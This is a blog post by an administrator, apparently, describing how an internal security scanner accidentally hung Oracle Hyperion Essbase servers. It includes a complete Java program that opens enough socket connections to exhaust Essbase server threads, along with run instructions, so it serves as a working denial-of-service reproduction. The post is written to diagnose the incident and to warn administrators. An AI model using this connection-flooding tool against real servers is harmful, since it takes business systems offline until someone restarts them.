Introduction
One morning hyperion developers started complain on Essbase, hyperion services were not able connect to Essbase (including EAS console). Every try hanged client, and we had to kill process thought task. We stopped Essbase service and started it again, then everythings works fine. But what did happen with Essbase???
Accedantal DoS attack
(Bug applied to Hyperion Essbase 11.1.2.3.500+ and 11.1.2.4.0+)
In my opinion developers of Hyperion EPM products don't seriously worried about external security, because it mostly uses in private corporate networks, therefore they let use old versions of JDK, application servers and other services, because nobody need to hack Hyperion EPM in private corporate network.
In my opinion developers of Hyperion EPM products don't seriously worried about external security, because it mostly uses in private corporate networks, therefore they let use old versions of JDK, application servers and other services, because nobody need to hack Hyperion EPM in private corporate network.
But... return to our Essbase incident. At first I checked Essbase logs and noticed something interesting:
I saw multiple non secure connection directly to Essbase Application process (ESSSVR). I was sure, multiple connections hangs Essbase server. The number of connection equals to SERVERTHREADS parameter from ESSBASE.cfg. This DoS attack was made by security scanner, which our security service uses for scanning internal network.
How reproduce this issue?
Lets look at essbase application, it has 3 open ports
Every port can get only SERVERSTHREADS connection.
I need to reproduce this issue, therefore I made simple java program for it.
import java.io.BufferedReader; import java.io.InputStreamReader; import java.io.PrintWriter; import java.net.Socket; public class EssbaseDoSConnector{ public static void main(String[] args){ if(args.length!=4){ System.out.println("USAGE: HOST BEGIN_PORT END_PORT NUMBER_OF_SESSIONS"); return; } String hostName = args[0]; int sessionNumber = Integer.parseInt(args[3]); // number of sessions int startPort=Integer.parseInt(args[1]),endPort=Integer.parseInt(args[2]); int cnt=0; for(int port=startPort;port<=endPort;port++){ for(int j=0;j<sessionNumber;j++){ try{ System.out.println("connecting to port "+port); Socket socket = new Socket(hostName, port); cnt++; PrintWriter out = new PrintWriter(socket.getOutputStream(),true); out.write("TEST MESSAGE\n"); out.write("TEST MESSAGE\n"); out.write("TEST MESSAGE\n"); out.write("TEST MESSAGE\n"); }catch(Exception e){ System.out.println("Error connecting port "+port+" port is busy"); } } } System.out.println("FINISH - number of successful connections:"+cnt); } }
Compilation is very simple:
It has 4 parameters:
HOST - essbase server name
BEGIN_PORT - begin port of essbase application (in our example 32786 )
END_PORT - end port of essbase application (in our example 32788 )
NUMBER_OF_SESSION is number of server threads in essbase.cfg
Lets try:
At first sight, nothing critical happens... Threads limit was achieved, and than essbase closed sessions.
Try again:
The same result, but Essbase application can't accept new incoming connections, during some time all applications become inaccessible....
We need to restart Essbase server for repairing Essbase....
P.S.
Nobody wanted to attack Essbase server) it was standard security check which hangs all essbase servers.Be careful with security scanners. Metalink contains several documents about similar issues, but it didn't helped, therefore administrators have to worried about this issue, because it could be critical for Essbase Server and data.
Good luck )
No comments:
Post a Comment